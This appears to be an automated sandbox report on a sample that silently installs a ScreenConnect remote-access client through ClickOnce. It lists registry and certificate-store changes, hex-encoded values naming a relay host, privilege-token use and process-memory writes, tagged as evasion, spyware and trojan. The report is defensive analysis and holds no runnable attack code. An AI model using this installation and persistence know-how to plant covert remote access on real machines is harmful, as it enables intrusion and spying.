Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0001_none_048898fe944efa4a\implication!scre..tion_25b0fbb6ef7eb094_0018.0001_2d = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0001_none_38bfd8c0a9435f4e\SizeOfStronglyNamedComponent = 26eb020000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0001_none_b47bd9d9e77379ec\Files\ScreenConnect.WindowsClient.exe_6492277df = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0001_none_38bfd8c0a9435f4e\lock!02000000ce58570e400300002c130000000000000000000 = 30303030303334302c30316461623030363732396462346665	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\OnlineAppQuotaUsageEstimate = "3636721"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb = 3c004100700070006c00690063006100740069006f006e00540072007500730074002000760065007200730069006f006e003d002200310022000d000a00460075006c006c004e0061006d0065003d002200680074007400700073003a002f002f0074006500680069006800320038003700360038002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0031002e0037002e0038003800390032002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0031002e0037002e0038003800390032002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e003300320022000d000a00540072007500730074006500640054006f00520075006e003d002200740072007500650022000d000a0050006500720073006900730074003d002200740072007500650022003e000d000a003c00440065006600610075006c0074004700720061006e0074003e000d000a003c0050006f006c00690063007900530074006100740065006d0065006e0074002000760065007200730069006f006e003d002200310022003e000d000a003c005000650072006d0069007300730069006f006e00530065007400200063006c006100730073003d002200530079007300740065006d002e00530065006300750072006900740079002e005000650072006d0069007300730069006f006e0053006500740022000d000a00760065007200730069006f006e003d002200310022000d000a00490044003d00220043007500730074006f006d0022000d000a00530061006d00650053006900740065003d002200730069007400650022000d000a0055006e0072006500730074007200690063007400650064003d002200740072007500650022000d000a0078006d006c006e0073003a00610073006d00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600310022000d000a0078006d006c006e0073003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a00610073006d00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a007800730069003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300031002f0058004d004c0053006300680065006d0061002d0069006e007300740061006e006300650022000d000a0078006d006c006e0073003a0063006f002e00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600310022000d000a0078006d006c006e0073003a00610073006d00760033003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600330022000d000a0078006d006c006e0073003a0064007300690067003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300030002f00300039002f0078006d006c006400730069006700230022000d000a0078006d006c006e0073003a0063006f002e00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600320022003e000d000a003c0049005000650072006d0069007300730069006f006e00200063006c006100730073003d002200530079007300740065006d002e004e00650074002e005700650062005000650072006d0069007300730069006f006e002c002000530079007300740065006d002c002000560065007200730069006f006e003d0032002e0030002e0030002e0030002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d00620037003700610035006300350036003100390033003400650030003800390022000d000a00760065007200730069006f006e003d002200310022003e000d000a003c0043006f006e006e006500630074004100630063006500730073003e000d000a003c0055005200490020007500720069003d00220028006800740074007000730029003a002f002f0074006500680069006800320038003700360038005c002e00730063007200650065006e0063006f006e006e006500630074005c002e0063006f006d002f002e002a0022002f003e000d000a003c002f0043006f006e006e006500630074004100630063006500730073003e000d000a003c002f0049005000650072006d0069007300730069006f006e003e000d000a003c002f005000650072006d0069007300730069006f006e005300650074003e000d000a003c002f0050006f006c00690063007900530074006100740065006d0065006e0074003e000d000a003c002f00440065006600610075006c0074004700720061006e0074003e000d000a003c004500780074007200610049006e0066006f00200044006100740061003d00220030003000300031003000300030003000300030004600460046004600460046004600460030003100300030003000300030003000300030003000300030003000300030003000430030003200300030003000300030003000350037003500330037003900370033003700340036003500360044003200450035003700360039003600450036003400360046003700370037003300320045003400360036004600370032003600440037003300320043003200300035003600360035003700320037003300360039003600460036004500330044003300340032004500330030003200450033003000320045003300300032004300320030003400330037003500360043003700340037003500370032003600350033004400360045003600350037003500370034003700320036003100360043003200430032003000350030003700350036003200360043003600390036003300340042003600350037003900350034003600460036004200360035003600450033004400360032003300370033003700360031003300350036003300330035003300360033003100330039003300330033003400360035003300300033003800330039003000350030003100300030003000300030003000330030003500330037003900370033003700340036003500360044003200450035003300360035003600330037003500370032003600390037003400370039003200450035003000360046003600430036003900360033003700390032004500340031003700300037003000360043003600390036003300360031003700340036003900360046003600450035003400370032003700350037003300370034003400350037003800370034003700320036003100340039003600450036003600360046003000310030003000300030003000300031003800370032003600350037003100370035003600350037003300370034003700330035003300360038003600350036004300360043003400390036004500370034003600350036003700370032003600310037003400360039003600460036004500300030003000310030003200300030003000300030003000300030003000420022002f003e000d000a003c002f004100700070006c00690063006100740069006f006e00540072007500730074003e000d000a000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0001_none_38bfd8c0a9435f4e	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0001_none_e94a5e880ddeece3\implication!scre..tion_25b0fbb6ef7eb094_0018.0001_2d = 68747470733a2f2f746568696832383736382e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b\SizeOfStronglyNamedComponent = d84f040000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5f = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df\lock!0e0000004258570ec80c0000e80e0000000000000000000 = 30303030306363382c30316461623030363730366537643037	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 54007200750065000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0001_none_38bfd8c0a9435f4e	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0001_none_b47bd9d9e77379ec	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0001_none_e94a5e880ddeece3\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\scre..ient_4b14c015c87c1ad8_0018.0001_none_b47bd9d9e	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb = 30000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0001_none_b47bd9d9e77379ec	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0001_none_38bfd8c0a9435f4e\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0001_none_533500b5fe8f96df\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32342e312e372e383839322c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0001_none_57acd8973addaa0f\lock!14000000de58570e400300002c130000000000000000000 = 30303030303334302c30316461623030363732396462346665	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a42c4956b\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0001_867cd7c79f6dad8c\scre...exe_25b0fbb6ef7eb094_0018.0001_none_97cb9f2a4	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	ScreenConnect.WindowsClient.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe
4288	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3272	dfsvc.exe
Token: SeDebugPrivilege	4288	ScreenConnect.ClientService.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
1028	ScreenConnect.WindowsClient.exe
1028	ScreenConnect.WindowsClient.exe
1028	ScreenConnect.WindowsClient.exe
1028	ScreenConnect.WindowsClient.exe
1028	ScreenConnect.WindowsClient.exe

Suspicious use of SendNotifyMessage 5 IoCs

pid	Process
1028	ScreenConnect.WindowsClient.exe
1028	ScreenConnect.WindowsClient.exe
1028	ScreenConnect.WindowsClient.exe
1028	ScreenConnect.WindowsClient.exe
1028	ScreenConnect.WindowsClient.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4016 wrote to memory of 3272	4016	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe	84
PID 4016 wrote to memory of 3272	4016	24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe	84
PID 3272 wrote to memory of 832	3272	dfsvc.exe	90
PID 3272 wrote to memory of 832	3272	dfsvc.exe	90
PID 3272 wrote to memory of 832	3272	dfsvc.exe	90
PID 832 wrote to memory of 3052	832	ScreenConnect.WindowsClient.exe	92
PID 832 wrote to memory of 3052	832	ScreenConnect.WindowsClient.exe	92
PID 832 wrote to memory of 3052	832	ScreenConnect.WindowsClient.exe	92
PID 4288 wrote to memory of 1028	4288	ScreenConnect.ClientService.exe	95
PID 4288 wrote to memory of 1028	4288	ScreenConnect.ClientService.exe	95
PID 4288 wrote to memory of 1028	4288	ScreenConnect.ClientService.exe	95
PID 4288 wrote to memory of 1732	4288	ScreenConnect.ClientService.exe	96
PID 4288 wrote to memory of 1732	4288	ScreenConnect.ClientService.exe	96
PID 4288 wrote to memory of 1732	4288	ScreenConnect.ClientService.exe	96

C:\Users\Admin\AppData\Local\Temp\24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\24b92de6f1fa78d17586cc33516d2760_NeikiAnalytics.exe"
